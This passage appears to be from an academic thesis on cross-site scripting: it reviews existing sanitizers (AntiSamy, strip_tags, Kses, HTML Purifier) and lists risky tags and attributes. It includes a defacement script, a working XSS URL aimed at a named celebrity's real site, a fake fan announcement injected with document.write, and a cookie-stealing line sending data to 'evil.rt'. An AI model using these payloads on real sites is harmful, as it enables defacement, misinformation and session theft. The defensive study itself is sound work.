    document.write("Maria Sharapova is glad to announce you her new decision, which changes her all life for ever. Maria has decided to quit the carrier in Tennis and become a Security Expert. She already passed Cisco exams and now she has status of an official CCIE. Maria is sure, her fans will understand her decision and will respect it. Maria already accepted proposal from DoD and will work for the US government. She also will help Cisco to investigate computer crimes and hunt hackers down.");


    Let’s have a look at the following example provided by RSnake from ha.ckers.org.

    RSnake hosts a simple script (http://ha.ckers.org/weird/stallowned.js) that performs XSS

    defacement on every page where it is included. The script is defined like this:

    var title = "XSS Defacement";
    var bgcolor = "#000000";
    var image_url = "http://ha.ckers.org/images/stallowned.jpg";
    var text = "This page has been Hacked!";
    var font_color = "#FF0000";

    deface(title, bgcolor, image_url, text, font_color);

    // Replaces the whole page body with a centred defacement banner.
    function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
      document.title = pageTitle;
      document.body.innerHTML = '';
      document.bgColor = bgColor;

      var overLay = document.createElement("div");
      overLay.style.textAlign = 'center';
      document.body.appendChild(overLay);

      var txt = document.createElement("p");
      txt.style.font = 'normal normal bold 36px Verdana';
      txt.style.color = fontColor;
      txt.innerHTML = pageText;
      overLay.appendChild(txt);

      // Use the parameter, not the global image_url, so the function works on its inputs.
      if (imageUrl != "") {
        var newImg = document.createElement("img");
        newImg.setAttribute("border", '0');
        newImg.setAttribute("src", imageUrl);
        overLay.appendChild(newImg);
      }

      var footer = document.createElement("p");
      footer.style.font = 'italic normal normal 12px Arial';
      footer.style.color = '#DDDDDD';
      footer.innerHTML = pageTitle;
      overLay.appendChild(footer);
    }

    In order to use the script we need to include it the same way we did when defacing Maria

    Sharapova’s home page. In fact, we can apply the same trick again. The defacement URL is:

    http://www.mariasharapova.com/defaultflash.sps?page=//%20--%3E%3C/script%3E%3Cscript%20src=http://ha.ckers.org/weird/stallowned.js%3E%3C/script%3E%3C!--&pagenumber=1

    The result of the defacement is shown in Figure 2.9. Website defacement, XSS based or not, is an effective mechanism for manipulating the masses and promoting political and non-political points of view. Attackers can easily forge news items, reports, and important data using any of the XSS attacks. It takes only a few people to believe what they see to turn something fake into something real.


    The examples explained here are taken from [JEG]; refer to it for many more real-world XSS attacks and examples.

    Figure 2.9: Defacement

    2.8 XSS Vs. CSRF

    Cross-Site Scripting (XSS) and Cross-site Request Forgery (CSRF) attacks are frequently confused because they are closely related [RRO]. Both attacks are aimed at the user and often require the victim to access a malicious web page. The potential consequences of the two attack vectors can also be similar: the attacker is able to submit certain actions to the vulnerable web application using the victim's identity. The causes of the two attack classes are different, though. A web application that is vulnerable to XSS fails to properly sanitize user-provided data before including it in a webpage, thus allowing an attacker to include malicious JavaScript in the web application. This JavaScript is then executed by the victim's browser and initiates the malicious requests. XSS attacks have capabilities beyond creating HTTP requests and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited power over the webpage it is embedded in and is able to communicate with the attacker; for example, XSS can obtain and leak sensitive information.

    Cross Site Scripting (XSS) exploits the trust that a client has for the website or application. Users generally trust that the content displayed in their browsers is what the website being viewed intended to display. In contrast, CSRF exploits the trust that a site has for the user: the website assumes that if an 'action request' was performed, the request was sent by the user [ROB].

    An XSS flaw is exploited through a lack of input and/or output filtering. Filtering out dangerous characters such as <, >, ", ', &, ;, or # in an application could resolve the XSS flaw, since XSS results from the application performing insufficient data validation. XSS flaws may allow bypassing of any CSRF protections by leaking valid values of the tokens, by allowing Referer headers to appear to originate from the application itself, or by hosting hostile HTML and JavaScript elements right in the target application. Therefore, resolving XSS flaws should be given priority over CSRF weaknesses [CSRF].
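    As a minimal sketch of output encoding, the function below replaces each of the characters listed above with an HTML character reference instead of deleting it, so that user data is displayed as text rather than interpreted as markup. Encoding instead of removal is our substitution of technique, and the function name is hypothetical.

```python
# Characters listed in the text, mapped to HTML character references.
_ENTITIES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
    ";": "&#59;",
    "#": "&#35;",
}


def encode_for_html(text: str) -> str:
    # One pass over the input, so the "&", "#" and ";" written by a
    # replacement are never encoded a second time.
    return "".join(_ENTITIES.get(ch, ch) for ch in text)


print(encode_for_html('<b>"x"</b>'))
```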

    XSS aims at inserting active code into an HTML document, either to abuse client-side active scripting holes or to send privileged information (e.g. authentication/session cookies) to an attacker-controlled site. CSRF does not in any way rely on client-side active scripting; its aim is to take unwanted, unapproved actions on a site where the victim has some prior relationship and authority.

    Whereas XSS seeks to steal the online trading cookies so that an attacker can manipulate the victim's portfolio, CSRF seeks to use the victim's cookies to force the victim to execute a trade without his knowledge or consent.
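    For contrast, a common server-side defence against CSRF is a secret per-session token that a forged cross-site request cannot know (the synchronizer-token pattern, which this chapter does not itself describe). The sketch below uses hypothetical function names and models the session as a plain dict. As noted earlier, an XSS flaw in the same application can read such a token from the page, which is why XSS should be fixed first.

```python
import hmac
import secrets


def issue_csrf_token(session: dict) -> str:
    """Store a fresh random token in the session; the form embeds it in a hidden field."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def is_request_authentic(session: dict, submitted: str) -> bool:
    """Accept an action request only if it echoes the session's token."""
    expected = session.get("csrf_token")
    if expected is None or submitted is None:
        return False
    # Constant-time comparison; bytes avoid errors on non-ASCII input.
    return hmac.compare_digest(expected.encode(), submitted.encode())


session = {}
token = issue_csrf_token(session)
print(is_request_authentic(session, token))
```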


    CHAPTER 3

    EXISTING XSS DEFENSES

    There is a strong need for web applications to let users format their profiles or postings using Hypertext Markup Language / Cascading Style Sheets (HTML/CSS). To provide that functionality, developers must either allow users to supply their own source code directly or give the user an intermediate language to work with.

    As a simple solution, many lightweight markup languages other than HTML are available, such as BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX], and WYSIWYG editors. Their input is parsed by the message board system and then translated into a markup language that web browsers understand (HTML or XHTML).

    An example of intermediate language code for rendering green text is shown below.

    [color=green]Sample Text[/color]

    After translation, the above code is rendered to the user's browser in the target language, HTML/CSS, as seen below:

    Sample Text

    This is a safe approach in general because it does not allow users to specify arbitrary target-language code, which can be obfuscated and disguised using various encoding and fragmenting techniques. By providing an intermediate language and interpreting it in a top-down fashion, the application renders only the subset of HTML functionality that it wishes to support.
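    The top-down translation described above can be sketched as follows. The colour whitelist and the exact HTML produced for [color] are assumptions, since the original rendered example did not survive; the important point is that raw user input is escaped first, so only markup generated by the translator reaches the browser.

```python
import html
import re

# Hypothetical whitelist: only these colour names may appear in the output.
ALLOWED_COLORS = {"red", "green", "blue", "black"}

_COLOR_TAG = re.compile(r"\[color=([a-z]+)\](.*?)\[/color\]", re.IGNORECASE | re.DOTALL)


def bbcode_to_html(text: str) -> str:
    # Escape first, so any raw HTML the user typed is displayed, not interpreted.
    escaped = html.escape(text, quote=True)

    def replace(match: re.Match) -> str:
        color = match.group(1).lower()
        if color not in ALLOWED_COLORS:
            return match.group(2)  # unknown colour: keep the text, drop the formatting
        return f'<span style="color: {color}">{match.group(2)}</span>'

    return _COLOR_TAG.sub(replace, escaped)


print(bbcode_to_html("[color=green]Sample Text[/color]"))
```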

    There is a practical problem with this approach. The user will be fairly limited in formatting, because the limited instruction set provided by the web application is unlikely ever to be as complete as the HTML/CSS specifications. Moreover, although the attributes and values provided in these markup languages are not themselves vulnerable, problems can still arise in the way the markup is translated into HTML/XHTML (i.e., the translated HTML is not guaranteed to be secure).


    The other option when providing formatting capability is to allow users to input HTML/CSS directly. If the user's input cannot be trusted, it is imperative that the application be able to detect and remove any malicious code. Several solutions have been developed to detect and remove such code; in this chapter we examine them one by one in detail.

    3.1 AntiSamy

    AntiSamy [ANT] (named in reference to Samy Kamkar's now infamous MySpace XSS worm) was developed primarily to create an XSS filter that works on a positive and customizable security model. The secondary focus was to make the tool as user-friendly as possible, so that applications using it can tell users how their input was filtered or how they could adjust it so that it passes the filter.

    AntiSamy first sanitizes the user-supplied input using NekoHTML, to avoid false positives caused by unbalanced start or end tags. NekoHTML is a standalone Java API that transforms broken HTML of any version into clean XHTML 1.0.

    The main validation processing takes place in a depth-first fashion. Starting with the root, each node is processed according to the rules given for its node name (e.g., html or input) in the security policy XML file. There are three modes of validation (also called processing actions): filter, truncate and validate, each described below.

    Filter

    The filter processing action performs no validation per se; it only removes the start and end tags, promoting the tag's contents. This sanitization is useful in many cases. For example, if you do not want users to input meta tags that could interfere with your robot indexing, setting the tag to filter would have the effect demonstrated below.

    User Input: This is some text.

    Output after Filtering: This is some text.


    Truncate

    When the truncate processing action is set, no actual validation takes place. The truncate

    action simply removes all the attributes and child nodes of a tag, making validation of its

    attributes unnecessary. A number of tags should be set to truncate.

    User Input:
    Output after Truncating:

    Many formatting tags are set to truncate in the default policy file, including em, small,

    big, i, b, u, center, pre and more.
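    The filter and truncate actions described above can be modelled on a toy document tree. The Node class and the function names below are hypothetical simplifications for illustration, not AntiSamy's Java API.

```python
import html
from dataclasses import dataclass, field


@dataclass
class Node:
    """Hypothetical, simplified DOM node (not AntiSamy's own data structure)."""
    tag: str                                    # element name, or "#text"
    attrs: dict = field(default_factory=dict)
    children: list = field(default_factory=list)
    text: str = ""                              # only used by "#text" nodes


def filter_action(node: Node) -> list:
    """'filter': remove the start and end tags, promoting the children."""
    return list(node.children)


def truncate_action(node: Node) -> Node:
    """'truncate': keep the tag, but drop all attributes and child nodes."""
    return Node(node.tag)


def to_html(node: Node) -> str:
    """Serialize a node, escaping text and attribute values."""
    if node.tag == "#text":
        return html.escape(node.text)
    attrs = "".join(f' {k}="{html.escape(str(v))}"' for k, v in node.attrs.items())
    inner = "".join(to_html(child) for child in node.children)
    return f"<{node.tag}{attrs}>{inner}</{node.tag}>"


div = Node("div", {"id": "x"}, [Node("#text", text="This is some text.")])
print("".join(to_html(n) for n in filter_action(div)))
```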

    Validate

    The validate processing action is where the meat of the filtering logic resides. If there are

    no attributes defined for a tag by the policy file, the validate processing action will act the same

    as the truncate processing action, except the child nodes will be validated instead of removed.

    The validate action steps through each of the attributes in the tag to be filtered and checks

    if there is a corresponding entry for that tag and attribute combination in the policy file. If no

    entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its

    value against the rules in the entry.

    There are two ways for an attribute value to be validated: by being equal to a literal string value or by matching a regular expression. Accordingly, each attribute's definition in the policy can have a list of valid literal strings and a list of regular expressions to match. This is a departure from other XSS filters (and other security tools in general) that do not allow multiple ways to specify valid values, forcing the user to write overly complex (and likely incomplete or unpredictable) regular expressions.
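    A minimal sketch of the two validation routes, assuming a policy entry is simply a collection of literal strings plus a collection of regular expressions. The example entries for align and href are hypothetical, not taken from the default antisamy.xml.

```python
import re
from typing import Iterable


def is_valid_value(value: str,
                   literals: Iterable[str] = (),
                   patterns: Iterable[str] = ()) -> bool:
    """Accept a value equal to one literal, or fully matching one regex."""
    if value in literals:
        return True
    return any(re.fullmatch(p, value) for p in patterns)


# Hypothetical policy entries.
ALIGN_LITERALS = ("left", "right", "center", "justify")
HREF_PATTERNS = (
    r"https?://[\w.-]+(/[\w./?=&%-]*)?",  # absolute http(s) URL
    r"/[\w./-]*",                          # site-relative path
)

print(is_valid_value("center", ALIGN_LITERALS))
print(is_valid_value("javascript:alert(1)", patterns=HREF_PATTERNS))
```

    Simple cases stay readable as literals, and a regular expression is needed only where the set of values is open-ended.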

    When an attribute does not pass a validation check, one of a few onInvalid actions is taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is removeAttribute.

    If an attribute whose onInvalid action is removeTag fails validation, the tag holding the attribute being checked, together with its contents, is removed entirely. This onInvalid action is reserved for attributes whose removal would make the presence of the tag meaningless. An example usage of this setting is displayed below.

    Welcome, my name is var cke = document.cookie; var url= 'http://evil.rt/cookie.cgi'+cke; document.location = url; and I'm 25 years old!

    The message above is posted by a user. The result after it fails validation is shown below.

    Welcome, my name is and I’m 25 years old!

    If an attribute with an onInvalid action set to filterTag fails validation, the start and end

    tag of the node will be removed while the contents are promoted. This is exactly what happens in

    the filter processing action. The process can be seen below.

    Click on this!

    The message above is posted by a user. The result after passing this message to AntiSamy is:

    Click on this!

    The default onInvalid action is removeAttribute. When this onInvalid action is set (or if

    none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but

    the tag and its contents will remain. The process is shown below.


    The message above is posted by a user. The result after passing this message to AntiSamy is:

    The knowledge base for the filter's engine is an XML file called antisamy.xml. The same policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file was tailored to W3C's HTML 4.0 and CSS 2.0 specifications, so any official attribute defined by the specifications can be used. If a user agent supports an attribute that is not specified, it can be added to the policy file, though some effort has already been put into integrating the non-standard attributes that are used and honored in the wild.
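    The three onInvalid actions can be sketched with a tiny in-memory policy standing in for antisamy.xml. The policy entries, validators and function name are hypothetical, and tag-level rules are ignored; the sketch only shows how removeTag, filterTag and the default removeAttribute differ in what they keep.

```python
import html

# Hypothetical mini-policy: tag -> attribute -> (validator, onInvalid action).
POLICY = {
    "a": {"href": (lambda v: v.startswith(("http://", "https://")), "filterTag")},
    "img": {"src": (lambda v: v.lower().endswith((".gif", ".jpg", ".png")), "removeTag")},
    "p": {"align": (lambda v: v in ("left", "right", "center"), "removeAttribute")},
}
VOID_TAGS = {"img", "br", "hr"}  # elements that have no end tag


def validate_element(tag: str, attrs: dict, inner: str) -> str:
    """Sanitize one element whose inner HTML has already been validated."""
    rules = POLICY.get(tag, {})
    kept = {}
    for name, value in attrs.items():
        rule = rules.get(name)
        if rule is None:
            continue              # no policy entry: the attribute is removed
        check, on_invalid = rule
        if check(value):
            kept[name] = value
        elif on_invalid == "removeTag":
            return ""             # drop the tag and everything inside it
        elif on_invalid == "filterTag":
            return inner          # drop start/end tags, promote the contents
        # otherwise "removeAttribute" (the default): only this attribute is dropped
    attr_text = "".join(f' {k}="{html.escape(v)}"' for k, v in kept.items())
    if tag in VOID_TAGS:
        return f"<{tag}{attr_text}>"
    return f"<{tag}{attr_text}>{inner}</{tag}>"


print(validate_element("a", {"href": "javascript:evil()"}, "Click on this!"))
```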

    To summarize, OWASP AntiSamy is an API implemented in Java and .Net to ensure that user-supplied HTML/CSS complies with an application's rules. It has very good XSS cleaning abilities, since it removes anything it does not recognize. Architecturally speaking, OWASP AntiSamy is highly dependent on policy files, which are a highly extended form of XML Schema with information on which attributes and elements to allow. As such, the actual filtering code is relatively lightweight. Unfortunately, while XML Schema files can achieve a high level of control over validation, the regular-expression-heavy approach begins to show signs of stress when data types are complex (e.g. URIs).

    3.2 The strip_tags()

    The PHP function strip_tags() [STT] is the classic solution for attempting to clean up HTML by removing unwanted tags. It is the worst solution of all for avoiding XSS, because it does not validate attributes at all: anyone can insert a malicious script into an attribute such as onmouseover='xss();' and exploit the application. While this can be patched with a series of regular expressions that strip out on[event] attributes, strip_tags() is fundamentally flawed and should not be used. An example of using strip_tags() is illustrated below:


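    <?php
    // Illustrative input: a paragraph and a link carrying an event-handler attribute
    $text = '<p>Test paragraph.</p><a href="#fragment" onmouseover="xss();">Other text</a>';

    // Allow <p> and <a>; every other tag is removed
    echo strip_tags($text, '<p><a>');

    // The onmouseover attribute survives, because strip_tags() does not inspect attributes
    ?>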

    In the above example, strip_tags() strips all tags except <p> and <a>. Used this way, malicious tags can be stripped out, but the values of attributes cannot be validated. Attributes could be validated by writing extra code on the server side, but such a solution is neither efficient nor effective.

    3.3 PHP Input Filter

    PHP Input Filter [PIF] is the upgraded version of striptags(), with the ability to inspect

    attributes. PHP Input Filter implements an HTML parser, and performs very basic checks on

    whether or not tags and attributes have been defined in the whitelist (left upto user what he will

    permit). Since it completely fails in checking the well-formedness, it is trivially easy to trick the

    filter into leaving unclosed tags. Any user that allows the style attribute will be in great trouble as

    we can't simply just let CSS through and expect layout not to be badly mutilated.

    3.4 HTML_Safe/SafeHTML

    HTML_Safe/SafeHTML [HTS] works by parsing HTML with a SAX parser and performing validation and filtering as the handlers are called. Whereas strip_tags() can only strip tags, HTML_Safe strips all active content, including tags, attributes and attribute values. This parser strips all potentially dangerous content within HTML:

    opening tag without its closing tag

    closing tag without its opening tag

    any of these tags: "base", "basefont", "head", "html", "body", "applet", "object", "iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta", "style", "title", "blink", "xml" etc.

    any of these attributes: on*, data*, dynsrc

    javascript:/vbscript:/about: etc. protocols

    expression/behavior etc. in styles

    any other active content
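    A rough sketch of such blacklist checks follows. The tag list is copied from the description above; the regular expressions for attributes, protocols and styles are our own approximations, not HTML_Safe's code, and the function name is hypothetical.

```python
import re

# Tags listed in the HTML_Safe description.
DANGEROUS_TAGS = {
    "base", "basefont", "head", "html", "body", "applet", "object", "iframe",
    "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound",
    "link", "meta", "style", "title", "blink", "xml",
}
# Our approximations of "on*, data*, dynsrc", dangerous protocols and style tricks.
DANGEROUS_ATTR = re.compile(r"on\w+|data[\w-]*|dynsrc", re.IGNORECASE)
DANGEROUS_PROTOCOL = re.compile(r"\s*(javascript|vbscript|about):", re.IGNORECASE)
DANGEROUS_STYLE = re.compile(r"expression\s*\(|behavior\s*:", re.IGNORECASE)


def is_dangerous(tag: str, attr: str = "", value: str = "") -> bool:
    """Blacklist check on a tag and, optionally, one of its attributes."""
    if tag.lower() in DANGEROUS_TAGS:
        return True
    if not attr:
        return False
    if DANGEROUS_ATTR.fullmatch(attr):
        return True
    if DANGEROUS_PROTOCOL.match(value):
        return True
    return attr.lower() == "style" and bool(DANGEROUS_STYLE.search(value))


print(is_dangerous("a", "onmouseover", "xss()"))
```

    A check on the raw attribute value is easily evaded: is_dangerous("a", "href", "jav&#x61;script:alert(1)") returns False, because the character reference is not decoded before matching. This is one reason whitelists are generally preferred over blacklists.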

    It also tries to convert the code into valid XHTML, although htmltidy is a far better solution for this task. HTML_Safe does many things right, such as blacklisting dangerous attributes, but blacklisting entire tags (like style, applet, etc.) because they have some dangerous attributes results in a loss of functionality. In addition, it blocks every occurrence of XSS simply by stripping it off.

    3.5 Kses

    Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML elements and attributes, and it also performs several checks on attribute values (to avoid buffer overflow attacks). Kses can be used to avoid XSS, as it only allows the HTML elements and attributes that it was explicitly told to allow. It also removes additional "<" and ">" characters that people may try to sneak in somewhere. The set of API functions that Kses offers its users is shown below, with explanations.

    Table 3.1: Kses API's

    API | Functionality

    Parse($string = "") | The basic function of kses. Give it a $string, and it will strip out the unwanted HTML and attributes.

    AddProtocols() | Adds a protocol or list of protocols to the kses object to be considered valid during a Parse(). The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.

    Protocols() | Deprecated. Use AddProtocols().

    AddProtocol($protocol = "") | Adds a single protocol to the kses object that will be considered valid during a Parse().

    SetProtocols() | A straight setting/overwrite of existing protocols in the kses object. All existing protocols are removed, and the parameter is used to determine what protocol(s) the kses object will consider valid. The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.

    DumpProtocols() | Returns an indexed array of the valid protocols contained in the kses object.

    DumpElements() | Returns an associative array of the valid (X)HTML elements in the kses object, along with the attributes for each element and the tests that will be performed on each attribute.

    AddHTML($tag = "", $attribs = array()) | Allows the end user to add a single (X)HTML element to the kses object, along with any attributes that the element is allowed to have.

    RemoveProtocol($protocol = "") | Allows the removal of a single protocol from the list of valid protocols in the kses object.

    RemoveProtocols() | Allows the single or batch removal of protocols from the kses object. The parameter is either a string containing a protocol to be removed, or an array of strings that each contain a protocol.

    filterKsesTextHook($string) | For the OOP (Object Oriented Programming) version of kses, an additional hook that allows the end user to perform additional postprocessing of a string that is being run through Parse().

    _hook() | Deprecated. Use filterKsesTextHook().

    Configuring and using the Kses API is simple and flexible: the user can set the protocols he wants to allow or disallow, and can configure the API to add elements or attributes to, or remove them from, the preconfigured Kses. Users must be very cautious in using the API, as different ways of using it result in different functionality. However, Kses is not a very good option, as it has many loopholes that have been publicly exposed by its users [GEL].
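    The whitelist idea behind Kses (only explicitly allowed elements, attributes and protocols survive) can be sketched with Python's standard html.parser. The ALLOWED table plays the role of AddHTML() and ALLOWED_PROTOCOLS that of AddProtocols(), but all names here are hypothetical and this is not a port of Kses. Unbalanced tags are not repaired, and relative links are dropped because their scheme is empty.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical whitelist: element -> attributes it may keep.
ALLOWED = {"a": {"href", "title"}, "b": set(), "i": set(), "p": set()}
ALLOWED_PROTOCOLS = {"http", "https", "mailto"}
URL_ATTRS = {"href", "src"}


class WhitelistFilter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # disallowed element: its tags are dropped, its text is kept
        kept = []
        for name, value in attrs:
            value = value or ""  # the parser has already decoded character references
            if name not in ALLOWED[tag]:
                continue
            scheme = urlsplit(value.strip()).scheme.lower()
            if name in URL_ATTRS and scheme not in ALLOWED_PROTOCOLS:
                continue
            kept.append(f' {name}="{html.escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data))  # stray "<" and ">" become entities


def kses_like(text: str) -> str:
    parser = WhitelistFilter()
    parser.feed(text)
    parser.close()
    return "".join(parser.out)


print(kses_like('<a href="http://example.com" onclick="x()">hi</a>'))
```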

    3.6 htmLawed

    In its developers' words, the highly customizable htmLawed [HTM, HTL] filter can be used to make text with HTML more secure and policy-compliant. It can auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL protocols in the input. It also balances tags and checks for proper nesting of HTML elements. Furthermore, it can transform deprecated tags and attributes, check and convert character entities (e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure, etc. The set of features that htmLawed provides is quite impressive, but it simply strips off every occurrence of script. It fails to validate scripts and to differentiate a simple script from XSS.

    On the other hand, according to [HTP], htmLawed is a modified version of Kses (with some features added). It simply strips off the script tag in order to prevent execution of scripts, and its validation of attribute values is weak (it allows inclusion of cgi/javascript/html files, which may lead to XSS).

    3.7 Safe HTML Checker

    Safe HTML Checker [SHC] is of the same flavor as the others, but it is a well-written piece of code (strict in checking and parsing the tags). It is a whitelisting filter that removes every tag not found in its list of allowed tags. It is very strict in filtering all occurrences of script and CSS (Cascading Style Sheets). Safe HTML Checker was developed to satisfy the requirements shown below.

    1. Entered markup should be valid XHTML Strict, to stop comments from breaking validation and to keep things nice and tidy.

    2. No presentational markup! The web administrator should have complete control over style sheets, and posted comments should only be able to use structural HTML elements.

    3. Attributes should be restricted to those that add semantic meaning. JavaScript event attributes and CSS-related attributes should not be allowed.

    4. The web administrator should retain full control over the tags and attributes allowed in the comments.

    5. Submitted HTML must be kept free from anything that could pose a security risk, such as javascript: URLs.

    In order to satisfy these requirements, the developer of Safe HTML Checker was not much concerned about the loss of functionality his solution causes.

    3.8 HTML Purifier

    HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP. The developers of HTML Purifier claim that it removes all scripting code by auditing it thoroughly, which means the scripting functionality is lost. In this respect it is no different from all the other existing solutions, which strip off every occurrence of script.

    3.9 Summary

    Regarding the available API/tool support, the present situation is not at all encouraging. Even a combination of all these approaches is not promising for web application security; hardly any tool supports the proper approach. The absence of a holistic approach to identifying genuine XSS attacks is a real matter of concern for web application security.


    CHAPTER 4

    PROBLEM STATEMENT

    A simple script inserted in a message is very often mistaken for an XSS attack. Scripting is functionality provided for a better user experience. In existing solutions, any inserted script is always assumed to be malicious and is stripped. For example, alert("XSS") is not malicious, because it does not harm the user. In contrast, alert(document.cookie) is malicious, because it tries to access a browser DOM object (which is supposed to be secure); this may lead to hijacking of the user session. In security terms, an attack is something that harms a legitimate user. Hence we claim that merely inserting a script does not by itself constitute an XSS attack.
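    To illustrate the distinction drawn above, here is a deliberately simple heuristic that treats a script as malicious only if it touches a sensitive DOM object. The list of objects and the function name are hypothetical assumptions; this is not necessarily the method developed in this thesis, and tricks such as eval() or string concatenation would evade it.

```python
import re

# Hypothetical list of DOM objects whose use marks a script as an attack.
SENSITIVE_OBJECTS = (
    "document.cookie",
    "document.location",
    "window.location",
    "document.forms",
    "XMLHttpRequest",
)
_BRACKET_ACCESS = re.compile(r"""\[['"](\w+)['"]\]""")


def is_malicious(script: str) -> bool:
    """Heuristic: flag a script that touches any sensitive DOM object."""
    compact = re.sub(r"\s+", "", script)            # "document . cookie" -> "document.cookie"
    compact = _BRACKET_ACCESS.sub(r".\1", compact)   # document['cookie'] -> document.cookie
    return any(obj in compact for obj in SENSITIVE_OBJECTS)


print(is_malicious('alert("XSS")'), is_malicious("alert(document.cookie)"))
```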

    Having understood XSS attacks, another challenge we identified in safeguarding users from them is whether to choose a server-side or a client-side solution. A client-side solution can help users who are security conscious, who are familiar with XSS attacks, and who have some technical expertise (to use the solution we provide); such a solution may not help novice users.

    This project aims at developing a holistic server-side XSS API that differentiates an XSS attack from a simple script and strips off only the attack. Thus novice users can enjoy a safe and better browsing experience without any loss of functionality, and without the need for additional software or configuration on the browser side. Such an API also reduces the burden on web administrators of safeguarding their web applications from malignant XSS attacks.


    CHAPTER 5

    DIFFERENTIATING XSS FROM SIMPLE SCRIPTS

    An analysis of the available and widely used solutions for XSS is presented in Chapter 3. The points that the existing solutions miss, which give rise to a new set of problems, are discussed in Chapter 4. This chapter presents a solution to the problem/challenge identified.

    It is well known that XSS occurs because of malicious script inserted by an attacker into a web application. Before determining what constitutes malicious script, we should therefore find where an attacker has scope to insert malicious script into the web application. When the markup languages were designed, none of the tags or attributes were meant for malicious purposes; they were made for genuine usage, but attackers/hackers misuse these tags and attributes for their own profit (typically for fame or theft). Through our observation, we found a list of tags and attributes that give an attacker scope to insert malicious script; this list is shown in Table 5.1:

    Table 5.1: Tags and their attributes which are in favour of attackers

    Tag | Attribute

    form | action

    body | background

    applet | code

    object | data

    a, area, link | href

    iframe, frame, img | longdesc

    img | onabort

    a, area, button, input, label, select, textarea | onblur

    input, select, textarea | onchange

    a, abbr, acronym, address, area, tt, i, b, small, big, body, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h6, input, ins, label, legend, li, link, map, menu, noframes, noscript, ol, hr, img, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | onclick, ondblclick, onkeydown, onkeypress, onkeyup, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup

    body, frameset | onload

    a, area, button, input, label, select, textarea | onfocus

    form | onreset

    input, textarea | onselect

    form | onsubmit

    body, frameset | onunload

    frame, iframe, img, input, script | src

    a, abbr, acronym, address, applet, area, tt, i, b, small, big, basefont, bdo, blockquote, body, br, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, font, form, frame, frameset, h1 - h6, hr, iframe, img, input, ins, label, legend, li, link, map, menu, noframes, noscript, object, ol, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | style

    Having understood that the above tags and attributes give an attacker scope to insert malicious script, it is essential to know how they are accessible to an attacker. The total set of attributes found vulnerable can be categorized into three types:

    1. Attributes that bring in content from outside the actual page, such as href, src, etc., through which a page/object with malicious content can be included in the existing page.

    2. Attributes that allow the user to write script directly, such as onload, onmouseover, onclick, etc., through which malicious script can be included.

    3. Attributes that allow the user to style his content, such as style.
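    The three categories can be expressed as a small classification function. The set of external-content attributes follows the list given for the first category in this section (plus lowsrc and dynsrc from Table 5.2); treating every on* attribute as script and the category labels themselves are our assumptions.

```python
# Attributes that pull in external content (first category).
URL_ATTRIBUTES = {
    "action", "background", "classid", "code", "data",
    "href", "longdesc", "src", "lowsrc", "dynsrc",
}


def categorize(attribute: str) -> str:
    """Map an HTML attribute name to one of the three risk categories."""
    name = attribute.lower()
    if name in URL_ATTRIBUTES:
        return "external-content"   # category 1: check what the URL points to
    if name.startswith("on"):
        return "script"             # category 2: event handlers run script directly
    if name == "style":
        return "styling"            # category 3: CSS supplied by the user
    return "other"


print(categorize("SRC"), categorize("onmouseover"), categorize("style"))
```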

    These three categories how they are different can be understood better with an example.

    The first type is the set of attributes that include an external object or content in the current page. To illustrate how these attributes can be abused, consider the img tag. The external image for an img tag is supplied through the src attribute, and the image is then displayed in the existing page. An attacker, however, can supply a script instead of the image location: for example, a src value such as javascript:alert(document.cookie) shows the user's session cookie in an alert box every time the page is loaded. An alert by itself is not harmful, but because it exposes the session cookie, which is supposed to be kept secret, it is considered malicious.

    The attributes in this category are: action, background, classid, code, data, href, longdesc and src.

    Attributes of this type should be restricted so that they accept external content only with the file extensions appropriate to the tag and attribute. The extensions allowed for each tag and attribute are shown in Table 5.2.

    Table 5.2: Extensions allowed

    Tag | Attribute | Allowed extensions
    img, input (type=image) | src, lowsrc, dynsrc | .jpg, .jpeg, .png, .xbm, .gif, .bmp
    a, area, link | href | .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi
    frame, iframe | src | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx
    Any tag | longdesc | .txt, .rtf, .doc
    embed | src | .pdf, .doc, .wav
    Any tag | background | .jpg, .jpeg, .png, .xbm, .gif, .bmp
    script | src | This attribute is not allowed
    bgsound | src | .wav, .mid, .au
    applet | code | .class
    object | classid | .class, .py, .rb
    object | data | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram
